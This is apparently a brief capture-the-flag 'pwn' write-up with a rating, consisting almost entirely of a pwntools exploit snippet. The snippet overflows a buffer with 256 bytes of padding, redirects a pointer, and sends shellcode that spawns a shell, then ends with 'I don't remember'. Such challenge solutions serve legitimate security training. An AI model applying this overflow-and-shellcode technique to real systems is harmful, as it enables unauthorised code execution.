Tags: pwn
Rating: 2.3
not very complex, solve it by gdb
target = 0x60023c offset = 256 payload = 'A'*offset payload += p64(target+0x100) # debug() p.sendafter("Data: ", payload) sc=asm(shellcraft.sh()) p.sendafter("Data: ", p64(target+0x8)+sc)
I don't remember
